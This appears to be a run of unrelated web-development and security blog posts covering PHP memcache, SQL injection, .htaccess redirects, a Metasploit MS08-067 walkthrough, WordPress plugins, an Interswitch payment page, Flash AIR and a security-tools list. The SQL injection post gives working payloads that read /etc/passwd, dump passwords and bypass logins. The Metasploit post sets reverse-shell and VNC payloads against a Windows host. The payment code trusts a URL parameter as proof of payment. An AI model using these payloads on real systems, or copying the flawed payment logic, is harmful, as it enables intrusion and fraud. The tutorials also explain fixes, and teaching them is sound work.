// If we find the ages in memcache, return the cache result
  if(!empty($result)) return $result;

// if we cant find the cached result, we connect to the db 
  mysql_connect("localhost", "username", "password") or die(mysql_error());
  mysql_select_db("agedb") or die(mysql_error());

// Run the SQL query on the db
  $result = mysql_query($sql) or die(mysql_error()); 

// Next we save the result to memcache so that we can find it next time
  $memch->set($agekey, $result, true, 200); 

//remember I'm storing it in memcache for 200 seconds or I use 
//$memch->set($agekey, $result, false, 0); to store it for a very long time
//then we return the result
  return mysql_fetch_array( $result );

It’s that easy. I hope you now have an idea of how memcache works and how to use it. Google “memcache” if you want to learn more about it. Remember, Facebook uses Memcache aggressively.

Anyway, the app makes use of a custom UI, webIcon and other stuffs like that. I hope you guys that build native blackberry apps may find the code useful and may want to develop something nice with it.

The app can be downloaded here http://download.9jawap.net and its also available at Blackberry Appworld.

Here are some of the things you may learn from the code.

- How to create custom screens, textboxes buttons
- How to create blackberry menus, alert boxes
- using json in blackberry jdk
- retrieving device blackberry PIN
- using net.rim.device.api.ui.container.HorizontalFieldManager
- creating a webIcon
- using blackberry tableLayout
- using net.rim.device.api.system.Bitmap, paint,etc
- using com.blackberry.toolkit.ui.container.NegativeMarginVerticalFieldManager
- using UiApplication.getEventLock(), running multiple background processes
- encoding URL strings
- Threading
- updating your application / searching for updates
and more…

As I said before, its the first version of the app, the current version is 1.4, so a lot of changes has been made to the app.

Please comment below or ask a question if you have any issues with the code. Note: Blackberry JDK plugin for Eclipse was used to develop the app.

Hope you guys find it useful.

A SQL injection attack consists of insertion of a SQL query via the input data from the client to the web application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete/Drop), execute administration operations on the database and issue commands to the operating system.

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Ok, lets look at a basic example from user.php

<?php
  $id = $_GET['id'];
  $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>

In the code snippet above, the “id” variable is not filtered, we can inject our SQL code in “id” variable. For example:

“http://localhost/user.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–”

And we get the “etc/passwd” file if magic_quotes = off and users have file privileges.

Lets look at another example from house/listing_view.php

$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result))
{
    $r = mysql_fetch_array($result);
}

Here we see that “id” variable value is the value set for “itemnr” and is not filtered in any way, so we can inject our code. Lets make a request:

“http://localhost/house/listing_view.php?itemnr=null+union+all+select+1,2,3,
concat(0x3a,email,password),5,6,7,8,9,10+from+users–”

And we get the email and the password from the users table.

Login Bypass

Lets look at another code snippet from /admin/login.php

$postuser = $_POST['username'];
$postpass = md5($_POST['password']); 
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE username = '$postuser' AND password = '$postpass'") 
or die("<p>" . mysql_error() . "</p>\n");

The variables here are not properly checked. We can bypass this login by injecting the following username and password:

username : admin ' or ' 1=1--
password : anything

When we pass in these values to the form, the code will eventually look like this when executing;

$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE username = 'admin' ' or ' 1=1-- AND password = 'anything'")

The “–” terminates the rest of the query, so we have something like SELECT * FROM " . $tablestart . "login WHERE username = 'admin' ' or ' 1=1

Fixing your codes

The simple way: Don’t allow special chars in variables. For numeric variables, use (int), example $id=(int)$_GET['id']; or $id = intval($_GET['id']);

Another way for non-numeric variables: Filter all special chars used in SQL: – , . ( ) ‘ ” _ + / * etc.

Also using mysql_real_escape_string will help:

$name = mysql_real_escape_string( $_POST[‘name’] );
$pwd  = mysql_real_escape_string( $_POST[‘pwd’] );

There are so many ways to prevent this attack, but if you are a little bit lazy and just want to get your website up and running without bothering yourself much about SQL injection attacks and some other security issues like Cross Site Scripting etc. Just use a framework to build your website.

Most of these PHP frameworks are properly built with MVC in mind and you can choose to filter your POST and GET request to prevent injection easily. Yii, Zend and Codeigniter are some of the best frameworks around.

I hope by now, you have an idea of how SQL injection works and what to do with it. This is just a quick tip of what SQL injection is all about and how to prevent it.

Three reasons why you should maintain a specific domain

To avoid the possibility of split page rank and/or split link popularity (inbound links). Though the two names bring similar result, they are actually two different domains. Just has m.my-domain-name.com is different from www.my-domain-name.com so also is my-doman-name.com different from the rest.

To avoid duplicate content on search engines. Search engines might be able to tell the difference between these two domains and hence record duplicate content of your site.

Its nicer and consistent. If you create a session for user, you expect it to be consistent across the browser tabs. Not using a specific domain could cause such inconsistency. If you have a link on your my-domain-name.com site to the www.my-domain-name.com or the user decides to append the , the user’s session will not be found on the www version.

Redirecting non-www to www

If you want to redirect all non-www requests to your site to the www version, add the following code to your .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

Translates to:
RewriteEngine On checks if the rewrite module is on else the other lines will not be processed.
! = not
^ = start
\. = . (the backslash is the escape character, because dots mean “any character” in regular expressions, and therefore must be escaped)

RewriteCond %{HTTP_HOST} !^www\. if the host name doesn’t start with www.
* means zero or more character
$ means end
(.*) means zero or more characters

RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
%{HTTP_HOST} will be replaced by the host name (i.e. my-domain-name.com).
$1 references whatever was matched in the regular expression between the brackets, which in this case is everything.
The [R=301,L] means a permanent redirect (HTTP 301 code) which means the browser will automatically redirect the next time

Redirecting www to non-www

Like twitter, you might prefer the my-domain-name over www.my-domain-name.com.

RewriteEngine On
RewriteCond %{HTTP_HOST} !^my-domain\.com$ [NC]
RewriteRule ^(.*)$ http://my-domain.com/$1 [R=301,L]

Here I assume you are already familiar with Backtrack or you already have one installed on your PC or virtual machine. If you don’t have one yet, or are not familiar with Backtrack or Metasploit you can find out about it and download it here http://www.backtrack-linux.org/.

Anyway, Metasploit was originally written in Perl, but later it was re-written in ruby, it’s basically a large database of exploit code, scanners, encoders and payloads. To know more about Metasploit visit the official website here http://www.metasploit.com/ . There is also a version for those that love windows too, so you can use it on your windows PC. I hate windows!

Ok, here is my Metasploit terminal; I assume you know how to get there already because it’s not really a tutorial for beginners.

Anyway, if you don’t still know how to get there, here it is, remember I’m using Backtrack Linux, on windows is easier.

Here is the exploit we are going to use “ms08_067_netapi”. I recommend using Metasploit on Linux or at least a Linux virtual machine, the windows version isn’t that cool.

Once we have Metasploit fired up, we type this:
nmap -sS -Pn -A 192.168.0.103 or nmap -sS -Pn -A 192.168.0.1/24 to scan more than one PC on the network.

The IP address above is the local address of the windows machine I’m scanning, this command is used for “port-scanning” your local area network to find live hosts , and report the number of open ports and the services (DAEMONS) running on them. Basically you should find SMB enabled on most of those PC’s.

After we find the machine, we run:
set RHOST 192.168.0.103 we set the IP address of the remote host (our windows PC)
set LHOST 192.168.0.107 we set the IP address of our current Linux PC
set THREADS 100 this is the thread value
use windows/smb/ms08_067_netapi This is the exploit we are using. SMB is used for file sharing on Windows and it has a vulnerability that we want to exploit.

Here is how it looks:

At this point, we use the show payloads command to get a list of suitable payloads.

Here I’m going to use a Reflective VNC injection as my payload. Next type:
set PAYLOAD windows/vncinject/bind_tcp and we are all set to attack!

Next type in exploit and let’s see what happens.

Remember, you can still use other payloads too e.g. I used set PAYLOAD windows/meterpreter/reverse_tcp to have access to the PC’s command shell. You can reboot the computer, shutdown, get the system info and do other stuffs like taking the screenshot and recording keystrokes too.

Hehehe… I luv this, just hacked my Windows XP on my virtual PC

If the exploit succeeds, you will get a VNC session, but if it doesn’t exist, it means the Windows PC has been patched, most likely windows XP SP1 or 2 should work, but I don’t think it will on SP3.

So get an old Windows XP PC and try the exploit on it as I did with my old windows XP SP1 on VMWare. With this tutorial, you should be able to exploit other vulnerabilities on windows 7, vista etc with Metasploit.

To find out the latest vulnerabilities on windows and how to exploit them, visit http://web.nvd.nist.gov/view/vuln/search or http://www.exploit-db.com/.

Remember, this is just a tutorial, do not use it on someone’s PC and I’m not responsible for anything that happens if you try. Anyway, I’m not too sure you will find so many people still using Windows XP SP1 but if you find, good luck to you.

I’ll be posting more articles on hacking and security here as time goes on, remember to post your questions at the “Ask a question” section, I’ll be willing to help.

This bug has been fixed a long time ago by Microsoft http://technet.microsoft.com/en-us/security/bulletin/ms08-067.

In this tutorial/tip I’m going to show you how to get started on creating your own WordPress plugin. I assume you are familiar with the WordPress framework and program well in PHP. Here is a basic definition for a WordPress Plugin:

WordPress Plugin: A WordPress Plugin is a program, or a set of one or more functions, written in the PHP scripting language, that adds a specific set of features or services to the WordPress weblog, which can be seamlessly integrated with the weblog using access points and methods provided by the WordPress Plugin Application Program Interface (API). (adapted from wordpress.org)

Creating the plugin

All wordpress plugins are located in wp-content/plugins/. Suppose we wanted to create a plugin to detect browsers and perform different tasks based on the browsers, we could call it “Browser Detector” and call our php file browserdetector.php.

So quickly here are the steps:

1. Create a folder “Browser Detector” and place it in the plugin directory stated above
2. Create the php file browserdetector.php in the folder
3. Write your code in the php file.

Step 3 requires a little more than just placing your code. It requires the standard plugin information header. Without this, your plugin cannot be activated and will never run. Here’s the format:

<?php
/*
Plugin Name: Name Of The Plugin
Plugin URI: http://URI_Of_Page_Describing_Plugin_and_Updates
Description: A brief description of the Plugin.
Version: The Plugin's Version Number, e.g.: 1.0
Author: Name Of The Plugin Author
Author URI: http://URI_Of_The_Plugin_Author
License: A "Slug" license name e.g. GPL2
*/
?>

<?php
/*  Copyright YEAR  PLUGIN_AUTHOR_NAME  (email : PLUGIN AUTHOR EMAIL)

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License, version 2, as 
    published by the Free Software Foundation.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
?>

Now you can place your code in the file. Our sample browserdetector.php code below is a plugin that provides a shortcode that can be placed in a post/page. See Creating A WordPress Shortcode Using A Custom Functions Plugin for more insight.

require_once('Browser.php');

function brower_properties( $atts ){
 /*
 * Create instance of a browser
 */
$browser = new Browser();
 
$properties = "Platform: {$browser->getPlatform()} <br />";
$properties .= "Browser Name: {$browser->getBrowser()} <br />";
$properties .=  "Browser Version: {$browser->getVersion()} <br />";
 
 return $properties;
}
add_shortcode( 'browserdetector', 'brower_properties' );

There you have it! See resources below to download the Brower.php class. Leave a comment if you have any trouble.

Here I will try to show you how quickly you can get that done on cPanel if you already have the PHP script you want to run at intervals.

Even if you do not know anything about cron jobs and have never run a cron job before, you can get started with the simple cron tool built into cPanel. To get to Cron Jobs on cPanel, enter the url below on your browser; remember to change “mysite.com” to your website url.

https://mysite.com:2083/frontend/x3/cron/index.html

To run a job, you’ll need the path to the PHP script you want to execute. I always advise you put all Cron scripts in a folder and use .htaccess to protect the files there.

The command to run:
wget -O - -q -t 1 http://www.mysite.com/cron/scriptname.php where “/con/scriptname.php” is the path to your PHP script or /home/mysite/public_html/cron.php

Next you’ll want to select an option from all the select boxes. Remember to select an option in each box. If you want something to run every day at 4AM, select Minute: 0; Hour: 4; Day: Every; Month: Every; Weekday: Every;

Click save and that’s all. You’ll get an email every time the cron job runs, but if you don’t want to get an email, put a blank space into the output email field at the top.

Previously, I used the function addTransaction() to store the transaction details before we send the request to WebPay, we need to do this to help us monitor each transaction, also it allows us to update the payment status whenever a payment is made. Anyway, I think it’s the best approach.

Let’s look at it this way; You store the transaction details whenever someone makes an order, next you send the order details/transaction details to Interswitch then Interswitch sends you a reply when the payment is made (success, failure, pending,…). Next you store the response you get from Interswitch and update the payment status of the transaction then redirect the user to a page displaying the details and status of the transaction, more like displaying an invoice.

The diagram below may explain it better.

That’s about how it works, so let’s begin with how we write the code for this. To store our order, we receive the entire order (POST) request from the form or cart page etc.

Making an Order

Before we do that, we need to set some variables at the top of our page to help receive response from Interswitch and also store some values needed to identify our website to Interswitch.

$id = $_SESSION['id']; // the userid of the person paying for a product
$success = $_GET["rspcode"]; // the response code we get fromInterswich
$appamt = $_GET["appamt"]; // the total amount of the order
$merchantID = "Demo"; // the merchant ID given to us buy interswitch
$cpID = "CADP628051"; // Also the CPID given to us by interswich

Let’s begin with the POST request from our cart page here…

if (isset($_POST['submit']) && isset($_REQUEST['tid']) && $_REQUEST['amount'] != null)
{
    //we want to find out if a checkout button is clicked and we are also sending the
    //transactionID and amount together with the request.
    //get all information from the post request
    
    $transaction_id = mysql_real_escape_string($_POST['tid']);
    $amount = mysql_real_escape_string($_POST['amount']);
    $buyer_id = mysql_real_escape_string($_POST['bid']);
    $description = mysql_real_escape_string($_POST['desc']);
    $pgate = "Interswitch";
    $time = date("D d F, Y  - g:i A", time());
    $result = addTransaction($transaction_id, $time, $buyer_id, $amount, $pgate, $description, 0);  
    ////here we store the transaction details with our addTransaction() function
    if ($result)
    // if we get a positive response from our function, it means the data was stored 
    //successfully. Remember to catch all errors, so you can also use else to display an error message
    //or from the function
    {
    //store these values so we can set and unset them when we are done with the transaction
        $_SESSION['tid'] = $transaction_id;
        $_SESSION['bid'] = $buyer_id;
        $_SESSION['desc'] = $description;
        $_SESSION['amount'] = $amount;
        $_SESSION['pgate'] = $pgate;
    }
}

Next we need to send the whole details to Interswitch

Sending a request to Interswitch WebPay

if ($success == null)
{
//or success = "" means we are not getting any response yet from Interswitch and we are trying to send WebPay a messsage
    ?>
    <div align="center" title="Secure Payment Page">
        <iframe align="middle" frameborder="0" width="40%" height="550" name="PayFrame" scrolling="no" id="PayFrame"></iframe>
    </div>
    <script type='text/javascript'>
        doPayment('<?php echo $amount; ?>','<?php echo $transaction_id; ?>','<?php echo $cpID; ?>', '<?php echo $merchantID ?>')
        //We are using “iframe” to display the Interswitch payment page on our website and using the doPayment() function to send the request to Interswitch
        function doPayment(amount,trnxID,cadpid,mertId)
        {    
            var trnxId  = trnxID;
            var cadpid  = cadpid;
            var mertId  = mertId;
            var amount = amount;
            var url = 'https://webpay.interswitchng.com/webpay/purchase.aspx'; 
            //this url may change , they have the test and live url, so remember to look at the documentation provided to get the test url and live url when you are done testing.
            var fullUrl = url + "?CADPID="+cadpid+"&MERTID="+mertId+"&TXNREF="+trnxId+"&AMT="+amount+"&TRANTYPE=00";
                            
            document.getElementById("PayFrame").src = fullUrl;
        }
    </script>

    <?php
    echo '<center><h1><a href="viewcart.php">Return to Shopping Cart !</a></h1></center>';
}

From the entire story we have above, we are using an iframe to display the payment page from Interswich, where the user enters his/her debit card number and pin on our page. The iFrame has a size, so you can adjust it to your taste. We also made use of a javascript function doPayment() that receives all our order details and sends the information to WebPay in a url string. We have something like this at the end:
https://webpay.interswitchng.com/webpay/purchase.aspx?CADPID=CADP628051&MERTID=Demo&TXNREF=38847f44ea44&AMT=3000&TRANTYPE=00

You can also view the payment page from Interswitch by typing the url above in your browser after filling the details correctly, like your Merchant ID, CPID, amount etc.

We have something like this eventually;

Receiving response from Interswitch WebPay

Now that the user has paid for the product, how do we receive the payment status from Interswitch and also display an invoice to the user? Well, we would need to look at our previous if statement that says if ($success == null) and create another if statement that looks out for other Interswich WebPay Success codes e.g., 00,09 etc.

We will have something like this:

if ($success == "00")
{
    //deal with successful transaction
    $query = mysql_query("UPDATE transactions SET t_status=1 WHERE transaction_id='" . $_SESSION['tid'] . "'");
    //all we do here is to update that our transaction on the database with the success code we get from WebPay and display a message to the user.
    echo "<div class=success>Transaction Successfull</div>";
    echo "<h3>Transaction details</h3><br/>";
    echo "<u><b>Transaction ID:</b></u><br/>" . $_SESSION['tid'] . "<br/><br/>";
    echo "<u><b>Description:</b></u><br/>" . $_SESSION['desc'] . "<br/><br/>";
    echo "<u><b>Total Amount:</b></u><br/>=N=" . number_format($_SESSION['amount']) . "<br/><br/>";
    echo "<u><b>Payment Method:</b></u><br/>" . $_SESSION['pgate'] . "<br/><br/>";
    echo "<u><b>Time:</b></u><br/>" . date("D d F, Y  - g:i A", time()) . "<br/><br/>";

    //delete the product from cart
    $query = mysql_query("DELETE FROM shopping_cart WHERE user_id='" . $_SESSION['bid'] . "'");

    echo '<center><h1><a href="viewcart.php">Shopping Cart !</a></h1></center>';
    /*
      I can add other success values from -1 to 25
      to display payment notifications to the user
      either error or other stuffs using else if ($success=="1")
      e.t.c. Then we unset all the session variables we used to store the transaction details
     */
    unset($_SESSION['tid']);
    unset($_SESSION['bid']);
    unset($_SESSION['desc']);
    unset($_SESSION['amount']);
    unset($_SESSION['pgate']);
}
else   
{ 
    //here, we can have another elseif() statement to display a message for other response 
    //codes we get from WebPay or just deal with other response codes as a failed transaction.
    //Deal with Timeout Here, Transaction ID no more valid
    
    echo "<div class=err>Error while requesting for transaction authorization, Transaction ID no more valid</div> ";
    echo '<center><h1><a href="viewcart.php">Shopping Cart !</a></h1></center>';
    $query = mysql_query("DELETE FROM transactions WHERE transaction_id='" . $_SESSION['tid'] . "'");
    
    //remember to unset all sessions containing the transaction details
    unset($_SESSION['tid']);
    unset($_SESSION['bid']);
    unset($_SESSION['desc']);
    unset($_SESSION['amount']);
    unset($_SESSION['pgate']);
}

What we have above receives a response from WebPay and displays a message to the user based on the response code it gets from Interswitch WebPay. There are several response codes you can handle in order to display a more detailed information to the user about a particular transaction. E.g. “You have insufficient balance”, “Issuer or switch Inoperative” etc.

Here is the list of response/error codes you will normally get from WebPay, please always remember to check the documentation provided by Interswitch while integrating.

RSPCODE – RSP DESCRIPTION
00 – Approved or completed successfully
01 – Refer to card issuer
02 – Refer to card issuer, special condition
03 – Invalid merchant
04 – Pick-up card
05 – Do not honor
06 – Error
07 – Pick-up card, special condition
08 – Honor with identification
09 – Request in progress
10 – Approved, partial
11 – Approved, VIP
12 – Invalid transaction
13 – Invalid amount
14 – Invalid card number
15 – No such issuer
16 – Approved, update track 3
17 – Customer cancellation
18 – Customer dispute
19 – Re-enter transaction
20 – Invalid response
21 – No action taken
22 – Suspected malfunction
23 – Unacceptable transaction fee
24 – File update not supported
25 – Unable to locate record
26 – Duplicate record
27 – File update field edit error
28 – File update file locked
29 – File update failed
30 – Format error
31 – Bank not supported
32 – Completed partially
33 – Expired card, pick-up
34 – Suspected fraud, pick-up
35 – Contact acquirer, pick-up
36 – Restricted card, pick-up
37 – Call acquirer security, pick-up
38 – PIN tries exceeded, pick-up
39 – No credit account
40 – Function not supported
41 – Lost card, pick-up
42 – No universal account
43 – Stolen card, pick-up
44 – No investment account
45 – Account closed
46 – Identification required
47 – Identification cross-check required
51 – Not sufficient funds
52 – No check account
53 – No savings account
54 – Expired card
55 – Incorrect PIN
56 – No card record
57 – Transaction not permitted to cardholder
58 – Transaction not permitted on terminal
59 – Suspected fraud
60 – Contact acquirer
61 – Exceeds withdrawal limit
62 – Restricted card

So it’s left for you to decide if you want to write an if or switch statement for these response codes in your payment page.

Alright, I hope you enjoyed this part, but it’s kind of a quick guide on how to integrate with WebPay. As soon as you are ready to integrate Interswich WebPay with your website, Interswitch will provide documentation on how to do this too.

Here is the complete payment page code for Interwsitch WebPay on our sample site, please note that this is not a production code, do not use it directly on a live site, it still needs to be properly tweaked if you want to use it on a production site. I hope I’ve tried to explain it as simple as I possibly can.

<?php
$pagetitle = "Pay with Interswitch";
include ('header.php');
?>

<div class="container">
    <?php
    if ($_SESSION['id'])
    {
        $id = $_SESSION['id'];
        $success = $_GET["rspcode"];
        $appamt = $_GET["appamt"];
        $merchantID = "Demo";
        $cpID = "CADP628051";
        if (isset($_POST['submit']) && isset($_REQUEST['tid']) && $_REQUEST['amount'] != null)
        {
            //get all information
            $transaction_id = mysql_real_escape_string($_POST['tid']);
            $amount = mysql_real_escape_string($_POST['amount']);
            $buyer_id = mysql_real_escape_string($_POST['bid']);
            $description = mysql_real_escape_string($_POST['desc']);
            $pgate = "Interswitch";
            $time = date("D d F, Y  - g:i A", time());
            $result = addTransaction($transaction_id, $time, $buyer_id, $amount, $pgate, $description, 0);
            if ($result)
            {
//store these values so we can set and unset them wen we are done with the transaction
                $_SESSION['tid'] = $transaction_id;
                $_SESSION['bid'] = $buyer_id;
                $_SESSION['desc'] = $description;
                $_SESSION['amount'] = $amount;
                $_SESSION['pgate'] = $pgate;
            }
        }
        if ($success == null)
        { //or success = ""
            ?>
            <div align="center" title="Secure Payment Page">
                <iframe align="middle" frameborder="0" width="100%" height="550" name="PayFrame" scrolling="no" id="PayFrame"></iframe>
            </div>
            <script type='text/javascript'>
                doPayment('<?php echo $amount; ?>','<?php echo $transaction_id; ?>','<?php echo $cpID; ?>', '<?php echo $merchantID ?>')
                function doPayment(amount,trnxID,cadpid,mertId)
                {    var trnxId  = trnxID;
                    var cadpid  = cadpid;
                    var mertId  = mertId;
                    var amount  = amount;
                    var url    = 'https://webpay.interswitchng.com/webpay/purchase.aspx';
                    var fullUrl = url + "?CADPID="+cadpid+"&MERTID="+mertId+"&TXNREF="+trnxId+"&AMT="+amount+"&TRANTYPE=00";
                    //alert(fullUrl);
                    document.getElementById("PayFrame").src = fullUrl;
                    //showWindow(fullUrl); //function in WebPAY_PopUp_Caller.txt
                }
            </script>

            <?php
            echo '<center><h1><a href="viewcart.php">Return to Shopping Cart !</a></h1></center>';
        }
        else if ($success == "00")
        {
            //deal with successful transaction
            $query = mysql_query("UPDATE transactions SET t_status=1 WHERE transaction_id='" . $_SESSION['tid'] . "'");

            echo "<div class=success>Transaction Successfull</div>";
            echo "<h3>Transaction details</h3><br/>";
            echo "<u><b>Transaction ID:</b></u><br/>" . $_SESSION['tid'] . "<br/><br/>";
            echo "<u><b>Description:</b></u><br/>" . $_SESSION['desc'] . "<br/><br/>";
            echo "<u><b>Total Amount:</b></u><br/>=N=" . number_format($_SESSION['amount']) . "<br/><br/>";
            echo "<u><b>Payment Method:</b></u><br/>" . $_SESSION['pgate'] . "<br/><br/>";
            echo "<u><b>Time:</b></u><br/>" . date("D d F, Y  - g:i A", time()) . "<br/><br/>";

//delete from cart
            $query = mysql_query("DELETE FROM shopping_cart WHERE user_id='" . $_SESSION['bid'] . "'");

            //show dem o

            echo '<center><h1><a href="viewcart.php">Shopping Cart !</a></h1></center>';
            /*
              I can add other success values from -1 to 25
              to display payment notifications to the user
              either error or other stuffs using else if ($success=="1")
              e.t.c.
             */
            unset($_SESSION['tid']);
            unset($_SESSION['bid']);
            unset($_SESSION['desc']);
            unset($_SESSION['amount']);
            unset($_SESSION['pgate']);
        }
        else
        { //Deal with Timeout Here, Transaction ID no more valid
            echo "<div class=err>Error while requesting for transaction authorisation, Transaction ID no more valid</div> ";
            echo '<center><h1><a href="viewcart.php">Shopping Cart !</a></h1></center>';
            $query = mysql_query("DELETE FROM transactions WHERE transaction_id='" . $_SESSION['tid'] . "'");

            unset($_SESSION['tid']);
            unset($_SESSION['bid']);
            unset($_SESSION['desc']);
            unset($_SESSION['amount']);
            unset($_SESSION['pgate']);
        }
    }
    else
    {
        echo '<h1>Please, <a href="index.php">login</a> and come back later!</h1>';
    }
    ?>

    <div class="clear"></div>
</div>

<?php
include ('footer.php');
?>

Thanks for going through this with me, please comment below if you have any question or like to point out some errors and make suggestions to omitted points in this article. I’ll be delighted to respond to your questions and comments.

Thanks.

Let’s get started.

I am using Adobe Flash Professional CS5 and ActionScript 3.0.
Create a new Air for Android application with the default screen size 480px by 800px (Android phone screen size)

On the first layer, add your buttons and text indicating what each button does as seen below; Name the first button Google and the second Hide/show. Give them the instance name btn_google and btn_hideshow respectively.

Google button(btn_google): loads the Google search page on your mobile application.

Hide/show (btn_hideshow): clears all HTML content from the application.

You can access these buttons from flash libary. Go to Windows> Common Libaries> Buttons. Select classic button > Arcade buttons > Drag and drop the buttons to stage and adjust the button with your free transform tool if you so wish.
The buttons and text should be positioned at the bottom layer because the upper region of the screen would act as a stage where our HTML content/ “browser” would be loaded.
Your screen should look like this;

Let’s add some ActionScript
In the first frame of the first layer, right click and select action. Add this piece of code to it.

import flash.geom.Rectangle;
import flash.events.MouseEvent;

var stagewebview: StageWebView = new StageWebView();
stagewebview.stage = this.stage;
stagewebview.viewPort=
new Rectangle(0,0,stage.stageWidth,stage.stageHeight-250);
stagewebview.loadURL( "http://www.stackarena.com" );

btn_google.addEventListener (MouseEvent.MOUSE_DOWN,goGoogle);
btn_hideshow.addEventListener (MouseEvent.MOUSE_DOWN,hideshowBrowser);

function goGoogle(evt:MouseEvent)
{
  stagewebview.loadURL( "http://www.google.co.uk ");
}

function hideshowBrowser(evt:MouseEvent)
{
  if (stagewebview.stage==null) stagewebview.stage=this.stage;
  else stagewebview.stage=null;
}

Explanation of the code above

import flash.geom.Rectangle;
import flash.events.MouseEvent;

The first line of the above code imports the packages flash.geom which helps us create A Rectangle object is an area defined by its position, as indicated by its top-left corner point (x, y) and by its width and its height.

The second line events.MouseEvent imports the package events.MouseEvent which responds when Flash® Player dispatches MouseEvent objects into the event flow whenever mouse events occur. A mouse event is usually generated by a user input device, such as a mouse or a trackball, that uses a pointer.

var stagewebview: StageWebView = new StageWebView();
stagewebview.stage = this.stage;
stagewebview.viewPort=
new Rectangle(0,0,stage.stageWidth,stage.stageHeight-250);
stagewebview.loadURL( "http://www.stackarena.com" );

This code creates an object of the StageWebView class and attaches it directly to the stage using the stage property of the StageWebView object. Note that StageWebView is not a display object that can be attached to a Flash display list. You can control the size of the rectangle in which the HTML content in a StageWebView displayed using the viewPort method.

btn_google.addEventListener (MouseEvent.MOUSE_DOWN,goGoogle);

function goGoogle(evt:MouseEvent)
{
  stagewebview.loadURL( "http://www.google.co.uk ");
}

We added btn_google button outside the StageWebView. In the code above, an event listener is added to it, and then a function is called to set the location.The function goGoogle, when executed, loads the Google web page in the StageWebView. The loadURL() method is used to load the URL in the WebView class.

btn_hideshow.addEventListener (MouseEvent.MOUSE_DOWN,hideshowBrowser);
function hideshowBrowser(evt:MouseEvent)
{
  if (stagewebview.stage==null) stagewebview.stage=this.stage;
  else stagewebview.stage=null;
}

We added btn_hideshow button outside the StageWebView. In the code above, an event listener is added to it, and then a function is called to set the StageWebView to null and set the view back to the stage.The function hideshowBrowser, when executed, unloads and loads the web page in the StageWebView.

You can test the movie using an emulator which is like testing directly on a mobile phone. In another tutorial, I would discuss how to test applications directly on your android phone.

Control > Test movie > in Air Debug Launcher(Mobile) or for keyboard shortcut Ctrl + Enter.

You can download the source file below and Don’t forget to ask questions!

MetaSploit :

Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,…
Official site: http://www.metasploit.com/

WireShark:

WireShark is a free and best Network Packet Analyzer tool for UNIX and Windows. It is used for networking troubleshooting, Malware analysis and education.
Homepage: http://www.wireshark.org

NMAP

Nmap(“Network Mapper”) Free Security Scanner For Network Exploration & Hacking.It is used to scan a network and gathers information about the target network including open ports,Services running in the host, OS information,packet filters/firewalls details, and more.
Official site: http://nmap.org/

John The Ripper:

JTR is free and fast password cracker. Its primary purpose is to detect weak Unix password.
Official site: http://www.openwall.com/john/

Acunetix Web Security Scanner:

Audit your website security and web applications for SQL injection, Cross site scripting and other web vulnerabilities with Acunetix Web Security Scanner.
This tools is not free one ;(
Official Site: http://www.acunetix.com

Maltego:

Maltego is an open source intelligence and forensics application. It will offer you mining and gathering of information as well as the representation of this information in a easy to understand format.
Official site: http://www.paterva.com/

IronWASP:

IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool’s features are simple enough to be used by absolute beginners.
Official site: http://ironwasp.org

Ettercap:

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
Official site: http://ettercap.sourceforge.net/

Please comment below if there are other useful tools you know about not listed here.

Here’s a demo code. Replace the necessary variables.

<?php
/*
** Connect to database:
*/
 
// Connect to the database (host, username, password)
$con = mssql_connect('servername','admin','password') 
    or die('Could not connect to the server!');
 
// Select a database:
mssql_select_db('stack') 
    or die('Could not select a database.');
 
// Example query: (TOP 10 equal LIMIT 0,10 in MySQL)
$SQL = "SELECT TOP 10 * FROM TableName ORDER BY ID ASC";
 
// Execute query:
$result = mssql_query($SQL) 
    or die('A error occured: ' . mysql_error());
 
// Get result count:
$Count = mssql_num_rows($result);
print "Showing $count rows:<hr/>\n\n";
 
// Fetch rows:
while ($Row = mssql_fetch_assoc($result)) {
 
    print $Row['Fieldname'] . "\n";
 
}
 
mssql_close($con);
?>

Note: Make sure php_mssql extension is turned on. This example was created on PHP version 5.3.1 so you might need to upgrade if it doesn’t work.